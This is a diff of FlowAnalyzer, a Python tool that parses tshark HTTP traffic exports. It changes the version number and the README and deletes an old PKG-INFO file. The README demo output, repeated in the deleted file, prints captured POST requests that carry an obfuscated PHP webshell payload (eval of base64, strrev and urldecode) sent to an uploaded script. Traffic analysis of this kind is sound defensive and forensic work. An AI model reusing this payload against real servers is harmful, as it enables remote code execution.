b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
|
|
70
|
+
序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
|
|
71
|
+
[+] 正在处理第2个HTTP流!
|
|
72
|
+
序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
|
|
73
|
+
序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
|
|
74
|
+
[+] 正在处理第3个HTTP流!
|
|
75
|
+
序号: 8请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1427', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTL1ACWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOSdqCqaPC9ZW7GI7C2kIPd0MqlXzqT3svOl%2B1gNW3x0TL4%2BUQ0cdgeygrWzt1XSzu7opY93Nvl1tILnOWMx', 时间: 1682596308.573707
|
|
76
|
+
序号: 9请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:48 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'50\r\n72a9c691ccdaab98fL1tMGI4YTljMn75e3jORcmaTQZQeEdS2jE3TKPMeDNjNg==b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596308.582312
|
|
77
|
+
```
|
|
78
|
+
|
|
79
|
+
# Contributing
|
|
80
|
+
Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
|
|
81
|
+
|
|
82
|
+
# License
|
|
83
|
+
|
|
84
|
+
This project is licensed under the [MIT License.](LICENSE)
|
|
@@ -7,7 +7,7 @@ with open(os.path.join(os.path.dirname(__file__), "README.md"), encoding="utf-8"
|
|
|
7
7
|
|
|
8
8
|
setup(
|
|
9
9
|
name="FlowAnalyzer",
|
|
10
|
-
version="0.2
|
|
10
|
+
version="0.3.2",
|
|
11
11
|
description="FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件",
|
|
12
12
|
author="Byxs20",
|
|
13
13
|
author_email="97766819@qq.com",
|
|
@@ -1,85 +0,0 @@
|
|
|
1
|
-
Metadata-Version: 2.1
|
|
2
|
-
Name: FlowAnalyzer
|
|
3
|
-
Version: 0.2.9
|
|
4
|
-
Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
|
|
5
|
-
Home-page: https://github.com/Byxs20/FlowAnalyzer
|
|
6
|
-
Author: Byxs20
|
|
7
|
-
Author-email: 97766819@qq.com
|
|
8
|
-
License: UNKNOWN
|
|
9
|
-
Description: # FlowAnalyzer
|
|
10
|
-
|
|
11
|
-
# Installation
|
|
12
|
-
|
|
13
|
-
Install the package using pip:
|
|
14
|
-
|
|
15
|
-
```
|
|
16
|
-
pip3 install FlowAnalyzer
|
|
17
|
-
```
|
|
18
|
-
|
|
19
|
-
```
|
|
20
|
-
pip3 install FlowAnalyzer -i https://pypi.org/simple
|
|
21
|
-
```
|
|
22
|
-
|
|
23
|
-
# Usage
|
|
24
|
-
|
|
25
|
-
请务必添加 `tshark.exe` 到环境变量,否则找不到会出错!
|
|
26
|
-
|
|
27
|
-
```
|
|
28
|
-
$ git clone https://github.com/Byxs20/FlowAnalyzer.git
|
|
29
|
-
$ cd ./FlowAnalyzer/
|
|
30
|
-
```
|
|
31
|
-
|
|
32
|
-
```python
|
|
33
|
-
# sourcery skip: use-fstring-for-formatting
|
|
34
|
-
import os
|
|
35
|
-
from FlowAnalyzer import FlowAnalyzer
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
baseDir = os.path.dirname(os.path.abspath(__file__))
|
|
39
|
-
flowPath = os.path.join(baseDir, "flow.pcapng")
|
|
40
|
-
display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
|
|
41
|
-
|
|
42
|
-
jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
|
|
43
|
-
for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
|
|
44
|
-
print(f"[+] 正在处理第{count}个HTTP流!")
|
|
45
|
-
|
|
46
|
-
request, response = http.request, http.response
|
|
47
|
-
if request:
|
|
48
|
-
request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
|
|
49
|
-
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
|
|
50
|
-
|
|
51
|
-
if response:
|
|
52
|
-
response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
|
|
53
|
-
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
|
|
54
|
-
```
|
|
55
|
-
|
|
56
|
-
```
|
|
57
|
-
$ python3 .\tests\demo.py
|
|
58
|
-
[+] 正在处理第1个HTTP流!
|
|
59
|
-
序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
|
|
60
|
-
序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
|
|
61
|
-
[+] 正在处理第2个HTTP流!
|
|
62
|
-
序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
|
|
63
|
-
序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
|
|
64
|
-
[+] 正在处理第3个HTTP流!
|
|
65
|
-
序号: 8请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1427', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTL1ACWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOSdqCqaPC9ZW7GI7C2kIPd0MqlXzqT3svOl%2B1gNW3x0TL4%2BUQ0cdgeygrWzt1XSzu7opY93Nvl1tILnOWMx', 时间: 1682596308.573707
|
|
66
|
-
序号: 9请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:48 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'50\r\n72a9c691ccdaab98fL1tMGI4YTljMn75e3jORcmaTQZQeEdS2jE3TKPMeDNjNg==b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596308.582312
|
|
67
|
-
```
|
|
68
|
-
|
|
69
|
-
# Contributing
|
|
70
|
-
Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
|
|
71
|
-
|
|
72
|
-
# License
|
|
73
|
-
|
|
74
|
-
This project is licensed under the [MIT License.](LICENSE)
|
|
75
|
-
|
|
76
|
-
Platform: UNKNOWN
|
|
77
|
-
Classifier: Development Status :: 3 - Alpha
|
|
78
|
-
Classifier: Intended Audience :: Developers
|
|
79
|
-
Classifier: License :: OSI Approved :: MIT License
|
|
80
|
-
Classifier: Programming Language :: Python :: 3
|
|
81
|
-
Classifier: Programming Language :: Python :: 3.6
|
|
82
|
-
Classifier: Programming Language :: Python :: 3.7
|
|
83
|
-
Classifier: Programming Language :: Python :: 3.8
|
|
84
|
-
Classifier: Programming Language :: Python :: 3.9
|
|
85
|
-
Description-Content-Type: text/markdown
|
FlowAnalyzer-0.2.9/PKG-INFO
DELETED
|
@@ -1,85 +0,0 @@
|
|
|
1
|
-
Metadata-Version: 2.1
|
|
2
|
-
Name: FlowAnalyzer
|
|
3
|
-
Version: 0.2.9
|
|
4
|
-
Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
|
|
5
|
-
Home-page: https://github.com/Byxs20/FlowAnalyzer
|
|
6
|
-
Author: Byxs20
|
|
7
|
-
Author-email: 97766819@qq.com
|
|
8
|
-
License: UNKNOWN
|
|
9
|
-
Description: # FlowAnalyzer
|
|
10
|
-
|
|
11
|
-
# Installation
|
|
12
|
-
|
|
13
|
-
Install the package using pip:
|
|
14
|
-
|
|
15
|
-
```
|
|
16
|
-
pip3 install FlowAnalyzer
|
|
17
|
-
```
|
|
18
|
-
|
|
19
|
-
```
|
|
20
|
-
pip3 install FlowAnalyzer -i https://pypi.org/simple
|
|
21
|
-
```
|
|
22
|
-
|
|
23
|
-
# Usage
|
|
24
|
-
|
|
25
|
-
请务必添加 `tshark.exe` 到环境变量,否则找不到会出错!
|
|
26
|
-
|
|
27
|
-
```
|
|
28
|
-
$ git clone https://github.com/Byxs20/FlowAnalyzer.git
|
|
29
|
-
$ cd ./FlowAnalyzer/
|
|
30
|
-
```
|
|
31
|
-
|
|
32
|
-
```python
|
|
33
|
-
# sourcery skip: use-fstring-for-formatting
|
|
34
|
-
import os
|
|
35
|
-
from FlowAnalyzer import FlowAnalyzer
|
|
36
